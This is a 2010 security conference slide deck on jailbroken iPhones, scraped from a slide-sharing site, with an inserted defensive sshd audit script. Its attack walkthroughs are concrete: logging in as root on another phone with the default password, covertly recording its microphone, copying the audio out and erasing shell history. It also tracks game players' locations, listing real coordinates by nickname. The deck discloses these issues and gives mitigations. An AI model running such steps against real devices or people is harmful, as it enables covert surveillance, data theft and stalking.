The New World of Smartphone Security
What Your iPhone Disclosed About You



                 Trevor Hawthorn
                 Managing Partner


Friday, July 9, 2010
Today's Talk

    "Pockets full of shells"

    "I can see you from my house"




Who I am now




Old Smartphone Best Practices

                                      = Bad


                               = Good

New Smartphone Best Practices

    1. IT will use the iPhone Configuration Utility so you can talk to Exchange, use the VPN, wireless, etc.
    2. Get iFart, it's hilarious.




If AT&T is in attendance:

    • Facts about AT&T and me:
        • I enjoy my AT&T wireless service
        • Feel that I have fantastic coverage everywhere I go at all times
        • Am sure you have the largest/fastest 3G network, regardless of what VZW says
        • Looking forward to years of receiving quality service from you
        • Would love to chat

Jailbreaking

                       blackra1n



                       pwnagetool




It opens up a whole new world of applications

    • common Unix binaries
    • sshd
    • tethering
    • pirate software
    • super easy to JB your phone




Impact on security

    "Jail breaking removes 80% of the iPhone's security precautions"
    Charlie Miller, SyScan 2009




How many iPhones are jailbroken?

    6.93%

    [1] http://www.slideshare.net/pinchmedia/piracy-on-the-appstore



Global Stats




ifconfig

    root# ifconfig
    lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 16384
            inet 127.0.0.1 netmask 0xff000000
    en0: flags=8963<UP,BROADCAST,SMART,RUNNING,PROMISC,SIMPLEX,MULTICAST> mtu 1500
            ether 00:21:e9:09:e3:4f
    pdp_ip0: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450
            inet 10.69.62.220 --> 10.69.62.220 netmask 0xffffffff
    pdp_ip1: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450
    pdp_ip2: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1024
    pdp_ip3: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1024
    en1: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
            inet 192.168.20.1 netmask 0xffffff00 broadcast 192.168.20.255
            ether 0a:0b:ad:0b:ab:e0


Interfaces

    en0 = 802.11 interface
    pdp_ip0 = primary cellular interface on APN: wap.cingular
    pdp_ip1 = activates when retrieving visual voicemail on APN: acds.voicemail
    pdp_ip2 = not sure
    pdp_ip3 = used with tethering



ifconfig

    pdp_ip0: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450
            inet 10.69.62.220 --> 10.69.62.220 netmask 0xffffffff




sshd




So what?



Until (about) October 16, 2009 AT&T did not filter device to device IP network traffic.




AT&T's Network
    Most people think it looks like this:




                            /32



AT&T's Network
    Actually, more like this:

                            Multiple /16's


Your smartphone (and laptop/blackberry, etc.) has been on one giant flat network...




So I started looking around...




Devices On the Network
                           10,589* IPs scanned


                       Count      Port           What?
                        83        22          sshd
                        24        80          http
                         4       2008        PDANet
                       3,644     62078     iPhone Default


Other stuff out there

    • Saw a Linux box with sshd
    • Windows Mobile devices
    • Blackberries
    • Windows PCs
    • PDANet for the iPhone is an open proxy.

ssh access between phones

    Trevors-iPhone:~ root# ssh root@10.69.62.100
    Password: [alpine]
    Nates-iPhone:~ root#
    Nates-iPhone:~ root# id
    uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),3(sys),4(tty),5(operator),8(procview),9(procmod),20(staff),29(certusers),80(admin)



Filesystem Guide

    Interesting stuff:

    /private/var/mobile/Library/Mail - Email (IMAP, Exchange, POP3, etc.)
    /private/var/mobile/Library/SMS - SMS Text Messages
    /private/var/mobile/Library/Voicemail - Voicemail in .amr format
    /private/var/mobile/Library/AddressBook - Contacts
    /private/var/mobile/Library/CallHistory - Call History
    /private/var/mobile/Library/Notes - Notes




/private/var/mobile/Library/CallHistory/call_history.db
                 /private/var/mobile/Library/AddressBook/AddressBook.sqlitedb
                 /private/var/mobile/Library/AddressBook/AddressbookImages.sqlitedb
                 /private/var/mobile/Library/Cookies/Cookies.plist
                 /private/var/mobile/Library/Keyboard/dynamic-text.dat
                 /private/var/mobile/Library/Mail/Accounts.plist
                 /private/var/mobile/Library/Mail/(mail account name)/Deleted Messages
                 /private/var/mobile/Library/Mail/(mail account name)/Sent Messages
                 /private/var/mobile/Library/Mail/(mail account name)/INBOX
                 /private/var/mobile/Library/Maps/History.plist
                 /private/var/mobile/Library/YouTube/Bookmarks.plist
                 /private/var/mobile/Library/Voicemail/(amr files)
                 /private/var/mobile/Library/Voicemail/voicemail.db
                 /private/var/mobile/Library/Safari/Bookmarks.plist
                 /private/var/mobile/Library/Safari/History.plist
                 /private/var/mobile/Library/Suspend.plist
                 /private/var/mobile/Library/Safari/SuspendState.plist
                 /private/var/mobile/Library/Safari/SMS/sms.db
                 /private/var/mobile/Library/Preference/(various preference Plists)
                 /private/var/mobile/Library/Notes/notes.db




Let's do a bit more

    Erica Utilities - cmd line utilities for the iPhone

    recAudio    recAudio: Record audio from the onboard microphone.
    findme      Queries the iPhone's GPS API to return latitude/longitude



[Diagram: Attacker (10.69.62.220) and Victim (10.69.62.100); labels: recAudio, scp/ssh, recording.aiff]



I can hear you typing

    Trevors-iPhone:~ root# scp bin/recAudio root@10.69.62.100:
    Password:
    recAudio                                       100%   19KB   1.3KB/s     00:00
    Trevors-iPhone:~ root# ssh root@10.69.62.100
    Password:
    Nates-iPhone:~ root# ./recAudio
    Start talking. Press ^C to finish.
    Starting recording
    ^C
    Interrupted.
    Stopping recording




    Nates-iPhone:~ root# ls -l *.aiff
    -rw-r--r-- 1 root wheel 43178 Oct 2 22:35 2009-10-92 at 22:35:04.aiff
    Nates-iPhone:~ root# mv 2009-10-92 at 22:35:04.aiff test.aiff
    Trevors-iPhone: root# scp root@10.69.62.100:~/*.aiff .
    Password:
    test.aiff                                   100%   523KB    2.2KB/s   00:00
    Nates-iPhone:~ root# rm test.aiff recAudio .bash_history
    Nates-iPhone:~ root# last

    wtmp begins at Fri Oct 2 22:41
    Nates-iPhone:~ root#




Other bad things

    • ./openURL tel://1-900-XXX-XXX
    • ./openURL tel://911 or tel://mynumber
    • Pillage filesystem: email, sms, notes, app data, etc.
    • apt-get install tcpdump nmap
    • go wild on whatever network en0 is connected to.


Worms and Exploits



Dutch Extortion




                         November 2009
ikee Worm




                       November 2009
Exploits

    • Phone/Privacy.A* command line tool
    • Phone/iBotNet.A* worm with C&C

    *Discovered by security firm Intego




Some good news

    • AT&T does segment part of their network:
        • e.g. I could not see friend in CA from DC
        • But I could see friend in Boston
    • No easy way to target specific individual (Identity to AT&T NAT IP address not super easy)
        • No way to correlate 10.x.x.x IP to person via Safari
        • decloak.net doesn't really work in Mobile Safari
    • Man this is slow...


email to ID user

    <img src="http://10.69.62.220/i.jpg">

    [Diagram: 10.69.63.220:80 and 10.69.63.110; the request between them is labelled src:10.69.63.110, dst:10.69.63.220]


What to do

    • Don't Jailbreak your phone if you care about security (sorry)
    • Change root and mobile users' passwords
    • Attention Cydia Folks: Do not bind sshd to pdp interfaces; force password change upon install
    • IT Folks: Policy on jailbroken iphones
    • AT&T: Filter mobile to mobile IP traffic
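
One way to check the "do not bind sshd to pdp interfaces" advice on a device, as an added example that is not part of the original slides. The function names are hypothetical, the sshd_config fragments are constructed, and the interface listing is abridged from the ifconfig slide; `ListenAddress` is the standard OpenSSH directive.

```shell
#!/bin/sh
# Added example: does sshd on this device accept connections on a cellular
# (pdp_ip*) interface? All function names here are hypothetical.

# Read `ifconfig` output on stdin; print "iface address" for each pdp_ip*
# interface that currently has an IPv4 address.
pdp_addresses() {
    awk '
        /^[a-z0-9_]+:/ { iface = $1; sub(/:$/, "", iface) }
        $1 == "inet" && iface ~ /^pdp_ip/ { print iface, $2 }
    '
}

# Read sshd_config text on stdin; print each ListenAddress with any :port
# removed. With no directive sshd binds every local address, shown as 0.0.0.0.
listen_addresses() {
    awk '
        tolower($1) == "listenaddress" { a = $2; sub(/:[0-9]+$/, "", a); print a; n++ }
        END { if (n == 0) print "0.0.0.0" }
    '
}

# audit_sshd IFCONFIG_TEXT SSHD_CONFIG_TEXT
# Prints "EXPOSED iface address" for each cellular address sshd would bind.
# Returns 1 when at least one is found, 0 otherwise. IPv4 only.
audit_sshd() {
    listen=$(printf '%s\n' "$2" | listen_addresses)
    findings=$(printf '%s\n' "$1" | pdp_addresses | while read -r iface addr; do
        for l in $listen; do
            if [ "$l" = "0.0.0.0" ] || [ "$l" = "$addr" ]; then
                echo "EXPOSED $iface $addr"
                break
            fi
        done
    done)
    if [ -z "$findings" ]; then
        return 0
    fi
    printf '%s\n' "$findings"
    return 1
}

# Interface listing abridged from the ifconfig slide.
IFCONFIG_SAMPLE=$(cat <<'EOF'
lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 16384
        inet 127.0.0.1 netmask 0xff000000
pdp_ip0: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450
        inet 10.69.62.220 --> 10.69.62.220 netmask 0xffffffff
pdp_ip1: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450
en1: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
        inet 192.168.20.1 netmask 0xffffff00 broadcast 192.168.20.255
EOF
)

# Constructed config with no ListenAddress: sshd binds every interface.
SSHD_STOCK=$(cat <<'EOF'
Port 22
#ListenAddress 0.0.0.0
PermitRootLogin yes
EOF
)

# Constructed config restricted to the en1 address from the sample above.
SSHD_RESTRICTED=$(cat <<'EOF'
Port 22
ListenAddress 192.168.20.1
PermitRootLogin yes
EOF
)

for name in stock restricted; do
    if [ "$name" = stock ]; then cfg=$SSHD_STOCK; else cfg=$SSHD_RESTRICTED; fi
    if out=$(audit_sshd "$IFCONFIG_SAMPLE" "$cfg"); then
        echo "$name: sshd is not bound to a cellular interface"
    else
        echo "$name: $out"
    fi
done
```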



Privacy and Location Based Apps



Location Based Apps

    • Underworld: Sweet Deal
    • Drug trafficking game with candy
    • Location matters, move product from point A to point B
    • Phone sends high resolution coordinates to game server


Like Druglords




Underworld: Sweetdeal




Google Maps




Paros

    • Client side proxy
    • Configure iPhone to use machine running Paros's IP address as proxy
    • Watch what your apps send and receive


Request




Response




Used to monitor players




Let's pick a non-intel agency player



                                              chezk



Request




Response




Lat/Lon to GMaps:




County Records




Facebook




Ok neat, what else?




Near real-time geolocation tracking of players




cURL + perl + crontab = csv + gpsbabel = kml + Google Earth = EPIC screen shots




curl script
          #!/bin/sh
          #
          # First login... (response headers, including cookies, are saved to headers.txt)
          #
          curl -s -H "User-Agent: Underworld premium/1.4.0 CFNetwork/459 Darwin/10.0.0d3" \
               -d @/home/trevor/iphone/login.xml \
               --dump-header /home/trevor/iphone/headers.txt \
               http://game.dl.a-steroids.com/TrafficServer/
          #
          # Then update location (-b reads the session cookies back from headers.txt)
          curl -s -H "User-Agent: Underworld premium/1.4.0 CFNetwork/459 Darwin/10.0.0d3" \
               -b /home/trevor/iphone/headers.txt \
               -d @/home/trevor/iphone/update_loc.xml \
               http://game.dl.a-steroids.com/TrafficServer/
          #
          # Get GMap objects
          curl -s -H "User-Agent: Underworld premium/1.4.0 CFNetwork/459 Darwin/10.0.0d3" \
               -b /home/trevor/iphone/headers.txt \
               -d @/home/trevor/iphone/gmap_update.xml \
               http://game.dl.a-steroids.com/TrafficServer/




perl script
               #!/usr/bin/perl

               use strict;
               use warnings;

               # make single or multiline input into one scalar
               my $glob = join('', (<>));

               # extract name-to-flag records (/s lets .*? span line breaks)
               my @records = $glob =~ /(<name>.*?<\/lon>)/igs;

               for (@records)
               {
                   # pull the player name and coordinates out of each record
                   my ($name, $lat, $lon) = $_ =~
                       qr|<name>(.*?)</name>.*?<lat>([-\d.]*)</lat><lon>([-\d.]*)</lon>|is;
                   print "$lat,$lon,$name\n";
               }




perl script output
                       39.93220206723633,-77.47186584472656,poppyseed
                       38.13753356933594,-77.06847380591797,Gadsden
                       39.98429718017578,-78.30014190673828,Ziggety
                       39.23520812988281,-77.40483581542969,Lexi
                       39.855418395996094,-77.2717056274414,Tatu
                       39.55705801582031,-77.4004086303711,Bigfoot
                       36.67790985107422,-77.5902328491211,Jeneko
                       38.297552490234375,-77.65829467773438,Stilbored
                       39.891050720214844,-77.55879211025781,Timoteo
                       39.66313247680664,-78.04374694824219,Gamber
                       36.295310314697266,-78.14061126700984,UnderWear




Comments/Feedback:
                       trevor.hawthorn@stratumsecurity.com
                            www.stratumsecurity.com
                                     Twitter:
                                 @packetwerks
                                @stratumsecurity


                            Special Thanks: Tiago Stock


Ā 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Enterprise Knowledge
Ā 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
Ā 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Servicegiselly40
Ā 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
Ā 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxKatpro Technologies
Ā 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
Ā 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
Ā 

Recently uploaded (20)

2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
Ā 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Ā 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
Ā 
šŸ¬ The future of MySQL is Postgres šŸ˜
šŸ¬  The future of MySQL is Postgres   šŸ˜šŸ¬  The future of MySQL is Postgres   šŸ˜
šŸ¬ The future of MySQL is Postgres šŸ˜
Ā 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
Ā 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
Ā 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
Ā 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
Ā 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
Ā 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Ā 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
Ā 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
Ā 
Finology Group ā€“ Insurtech Innovation Award 2024
Finology Group ā€“ Insurtech Innovation Award 2024Finology Group ā€“ Insurtech Innovation Award 2024
Finology Group ā€“ Insurtech Innovation Award 2024
Ā 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
Ā 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
Ā 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
Ā 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
Ā 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Ā 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
Ā 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
Ā 

The New World of Smartphone Security

  • 1. The New World of Smartphone Security What Your iPhone Disclosed About You Trevor Hawthorn Managing Partner Friday, July 9, 2010
  • 2. Today's Talk "Pockets full of shells"
  • 3. Today's Talk "I can see you from my house"
  • 4. Who I am now
  • 5. Old Smartphone Best Practices = Bad = Good
  • 6. New Smartphone Best Practices 1. IT will use the iPhone Configuration Utility so you can talk to Exchange, use the VPN, wireless, etc. 2. Get iFart, it's hilarious.
  • 7. If AT&T is in attendance:
  • 8. If AT&T is in attendance: • Facts about AT&T and me:
  • 9. If AT&T is in attendance: • Facts about AT&T and me: • I enjoy my AT&T wireless service
  • 10. If AT&T is in attendance: • Facts about AT&T and me: • I enjoy my AT&T wireless service • Feel that I have fantastic coverage everywhere I go at all times
  • 11. If AT&T is in attendance: • Facts about AT&T and me: • I enjoy my AT&T wireless service • Feel that I have fantastic coverage everywhere I go at all times • Am sure you have the largest/fastest 3G network, regardless of what VZW says
  • 12. If AT&T is in attendance: • Facts about AT&T and me: • I enjoy my AT&T wireless service • Feel that I have fantastic coverage everywhere I go at all times • Am sure you have the largest/fastest 3G network, regardless of what VZW says • Looking forward to years of receiving quality service from you
  • 13. If AT&T is in attendance: • Facts about AT&T and me: • I enjoy my AT&T wireless service • Feel that I have fantastic coverage everywhere I go at all times • Am sure you have the largest/fastest 3G network, regardless of what VZW says • Looking forward to years of receiving quality service from you • Would love to chat
  • 14. Jailbreaking blackra1n pwnagetool
  • 15. It opens up a whole new world of applications
  • 16. It opens up a whole new world of applications • common Unix binaries
  • 17. It opens up a whole new world of applications • common Unix binaries • sshd
  • 18. It opens up a whole new world of applications • common Unix binaries • sshd • tethering
  • 19. It opens up a whole new world of applications • common Unix binaries • sshd • tethering • pirate software
  • 20. It opens up a whole new world of applications • common Unix binaries • sshd • tethering • pirate software • super easy to JB your phone
  • 21. Impact on security "Jail breaking removes 80% of the iPhone's security precautions" Charlie Miller, SyScan 2009
  • 22. How many iPhones are jailbroken?
  • 23. 6.93% [1] http://www.slideshare.net/pinchmedia/piracy-on-the-appstore
  • 25. ifconfig
        root# ifconfig
        lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 16384
                inet 127.0.0.1 netmask 0xff000000
        en0: flags=8963<UP,BROADCAST,SMART,RUNNING,PROMISC,SIMPLEX,MULTICAST> mtu 1500
                ether 00:21:e9:09:e3:4f
        pdp_ip0: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450
                inet 10.69.62.220 --> 10.69.62.220 netmask 0xffffffff
        pdp_ip1: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450
        pdp_ip2: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1024
        pdp_ip3: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1024
        en1: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
                inet 192.168.20.1 netmask 0xffffff00 broadcast 192.168.20.255
                ether 0a:0b:ad:0b:ab:e0
  • 27. Interfaces en0 = 802.11 interface
  • 28. Interfaces en0 = 802.11 interface pdp_ip0 = primary cellular interface on APN: wap.cingular
  • 29. Interfaces en0 = 802.11 interface pdp_ip0 = primary cellular interface on APN: wap.cingular pdp_ip1 = activates when retrieving visual voicemail on APN: acds.voicemail
  • 30. Interfaces en0 = 802.11 interface pdp_ip0 = primary cellular interface on APN: wap.cingular pdp_ip1 = activates when retrieving visual voicemail on APN: acds.voicemail pdp_ip2 = not sure
  • 31. Interfaces en0 = 802.11 interface pdp_ip0 = primary cellular interface on APN: wap.cingular pdp_ip1 = activates when retrieving visual voicemail on APN: acds.voicemail pdp_ip2 = not sure pdp_ip3 = used with tethering
  • 32. ifconfig
        pdp_ip0: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450
                inet 10.69.62.220 --> 10.69.62.220 netmask 0xffffffff
  • 35. Until (about) October 16, 2009 AT&T did not filter device to device IP network traffic.
  • 36. AT&T's Network Most people think it looks like this: /32
  • 37. AT&T's Network Actually, more like this: Multiple /16's
  • 38. Your smartphone (and laptop/blackberry, etc.) has been on one giant flat network...
  • 39. So I started looking around...
  • 42. Devices On the Network: 10,589* IPs scanned
        Count   Port    What?
        83      22      sshd
        24      80      http
        4       2008    PDANet
        3,644   62078   iPhone Default
  • 43. Other stuff out there • Saw a Linux box with sshd • Windows Mobile devices • Blackberries • Windows PC's • PDANet for the iPhone is an open proxy.
  • 45. ssh access between phones
        Trevors-iPhone:~ root# ssh root@10.69.62.100
        Password: [alpine]
        Nates-iPhone:~ root#
        Nates-iPhone:~ root# id
        uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),3(sys),4(tty),5(operator),8(procview),9(procmod),20(staff),29(certusers),80(admin)
  • 46. Filesystem Guide. Interesting stuff:
        /private/var/mobile/Library/Mail - Email (IMAP Exchange, POP3, etc.)
        /private/var/mobile/Library/SMS - SMS Text Messages
        /private/var/mobile/Library/Voicemail - Voicemail in .amr format
        /private/var/mobile/Library/AddressBook - Contacts
        /private/var/mobile/Library/CallHistory - Call History
        /private/var/mobile/Library/Notes - Notes
  • 47. Files of interest:
        /private/var/mobile/Library/CallHistory/call_history.db
        /private/var/mobile/Library/AddressBook/AddressBook.sqlitedb
        /private/var/mobile/Library/AddressBook/AddressbookImages.sqlitedb
        /private/var/mobile/Library/Cookies/Cookies.plist
        /private/var/mobile/Library/Keyboard/dynamic-text.dat
        /private/var/mobile/Library/Mail/Accounts.plist
        /private/var/mobile/Library/Mail/(mail account name)/Deleted Messages
        /private/var/mobile/Library/Mail/(mail account name)/Sent Messages
        /private/var/mobile/Library/Mail/(mail account name)/INBOX
        /private/var/mobile/Library/Maps/History.plist
        /private/var/mobile/Library/YouTube/Bookmarks.plist
        /private/var/mobile/Library/Voicemail/(amr files)
        /private/var/mobile/Library/Voicemail/voicemail.db
        /private/var/mobile/Library/Safari/Bookmarks.plist
        /private/var/mobile/Library/Safari/History.plist
        /private/var/mobile/Library/Suspend.plist
        /private/var/mobile/Library/Safari/SuspendState.plist
        /private/var/mobile/Library/Safari/SMS/sms.db
        /private/var/mobile/Library/Preference/(various preference Plists)
        /private/var/mobile/Library/Notes/notes.db
  • 48. Let's do a bit more. Erica Utilities - cmd line utilities for the iPhone
        recAudio: Record audio from the onboard microphone.
        findme: Queries the iPhone's GPS API to return latitude/longitude
  • 49. [Diagram: Attacker (10.69.62.220) and Victim (10.69.62.100); labels: recAudio, scp/ssh, recording.aiff]
  • 50. I can hear you typing
        Trevors-iPhone:~ root# scp bin/recAudio root@10.69.62.100:
        Password:
        recAudio 100% 19KB 1.3KB/s 00:00
        Trevors-iPhone:~ root# ssh root@10.69.62.100
        Password:
        Nates-iPhone:~ root# ./recAudio
        Start talking. Press ^C to finish.
        Starting recording
        ^C
        Interrupted. Stopping recording
  • 51. (session continued)
        Nates-iPhone:~ root# ls -l *.aiff
        -rw-r--r-- 1 root wheel 43178 Oct 2 22:35 2009-10-92 at 22:35:04.aiff
        Nates-iPhone:~ root# mv 2009-10-92 at 22:35:04.aiff test.aiff
        Trevors-iPhone: root# scp root@10.69.62.100:~/*.aiff .
        Password:
        test.aiff 100% 523KB 2.2KB/s 00:00
        Nates-iPhone:~ root# rm test.aiff recAudio .bash_history
        Nates-iPhone:~ root# last
        wtmp begins at Fri Oct 2 22:41
        Nates-iPhone:~ root#
  • 52. Other bad things
  • 53. Other bad things • ./openURL tel://1-900-XXX-XXX
  • 54. Other bad things • ./openURL tel://1-900-XXX-XXX • ./openURL tel://911 or tel://mynumber
  • 55. Other bad things • ./openURL tel://1-900-XXX-XXX • ./openURL tel://911 or tel://mynumber • Pillage filesystem: email, sms, notes, app data, etc.
  • 56. Other bad things • ./openURL tel://1-900-XXX-XXX • ./openURL tel://911 or tel://mynumber • Pillage filesystem: email, sms, notes, app data, etc. • apt-get install tcpdump nmap
  • 57. Other bad things • ./openURL tel://1-900-XXX-XXX • ./openURL tel://911 or tel://mynumber • Pillage filesystem: email, sms, notes, app data, etc. • apt-get install tcpdump nmap • go wild on whatever network en0 is connected to.
  • 59. Dutch Extortion November 2009
  • 60. ikee Worm November 2009
  • 61. Exploits • Phone/Privacy.A* command line tool • Phone/iBotNet.A* worm with C&C *Discovered by security firm Intego
  • 62. Some good news
  • 63. Some good news • AT&T does segment part of their network:
  • 64. Some good news • AT&T does segment part of their network: • e.g. I could not see friend in CA from DC
  • 65. Some good news • AT&T does segment part of their network: • e.g. I could not see friend in CA from DC • But I could see friend in Boston
  • 66. Some good news • AT&T does segment part of their network: • e.g. I could not see friend in CA from DC • But I could see friend in Boston • No easy way to target specific individual (Identity to AT&T NAT IP address not super easy)
  • 67. Some good news • AT&T does segment part of their network: • e.g. I could not see friend in CA from DC • But I could see friend in Boston • No easy way to target specific individual (Identity to AT&T NAT IP address not super easy) • No way to correlate 10.x.x.x IP to person via Safari
  • 68. Some good news • AT&T does segment part of their network: • e.g. I could not see friend in CA from DC • But I could see friend in Boston • No easy way to target specific individual (Identity to AT&T NAT IP address not super easy) • No way to correlate 10.x.x.x IP to person via Safari • decloak.net doesn't really work in Mobile Safari
  • 69. Some good news • AT&T does segment part of their network: • e.g. I could not see friend in CA from DC • But I could see friend in Boston • No easy way to target specific individual (Identity to AT&T NAT IP address not super easy) • No way to correlate 10.x.x.x IP to person via Safari • decloak.net doesn't really work in Mobile Safari • Man this is slow...
  • 70. email to ID user: <img src="http://10.69.62.220/i.jpg"> [Diagram labels: 10.69.63.220:80, 10.69.63.110, src:10.69.63.110, dst:10.69.63.220]
  • 71. What to do • Don't Jailbreak your phone if you care about security (sorry) • Change root and mobile users' passwords • Attention Cydia Folks: Do not bind sshd to pdp interfaces; force password change upon install • IT Folks: Policy on jailbroken iPhones • AT&T: Filter mobile to mobile IP traffic
  • 72. Privacy and Location Based Apps
  • 74. Location Based Apps • Underworld: Sweet Deal
  • 75. Location Based Apps • Underworld: Sweet Deal • Drug trafficking game with candy
  • 76. Location Based Apps • Underworld: Sweet Deal • Drug trafficking game with candy • Location matters, move product from point A to point B
  • 77. Location Based Apps • Underworld: Sweet Deal • Drug trafficking game with candy • Location matters, move product from point A to point B • Phone sends high resolution coordinates to game server
  • 81. Paros • Client side proxy • Configure iPhone to use machine running Paros's IP address as proxy • Watch what your apps send and receive
  • 84. Used to monitor players
  • 90. Let's pick a non-intel agency player chezk
  • 96. Ok neat, what else?
  • 97. Near real-time geolocation tracking of players
  • 98. cURL + perl + crontab = csv + gpsbabel = kml + Google Earth = EPIC screen shots
  • 99. curl script
        #!/bin/sh
        #
        # First login...
        #
        curl -s -H "User-Agent: Underworld premium/1.4.0 CFNetwork/459 Darwin/10.0.0d3" -d @/home/trevor/iphone/login.xml --dump-header /home/trevor/iphone/headers.txt http://game.dl.a-steroids.com/TrafficServer/
        #
        # Then update location
        curl -s -H "User-Agent: Underworld premium/1.4.0 CFNetwork/459 Darwin/10.0.0d3" -b /home/trevor/iphone/headers.txt -d @/home/trevor/iphone/update_loc.xml http://game.dl.a-steroids.com/TrafficServer/
        #
        # Get GMap objects
        curl -s -H "User-Agent: Underworld premium/1.4.0 CFNetwork/459 Darwin/10.0.0d3" -b /home/trevor/iphone/headers.txt -d @/home/trevor/iphone/gmap_update.xml http://game.dl.a-steroids.com/TrafficServer/
  • 100. perl script
        #! /usr/bin/perl
        use strict;
        use warnings;
        # make single or multiline input into one scalar
        my $glob = join('',(<>));
        # extract name-to-flag records
        my @records = $glob =~ /(<name>.*?<\/lon>)/ig;
        for (@records) {
            # pull the player name and coordinates out of each record
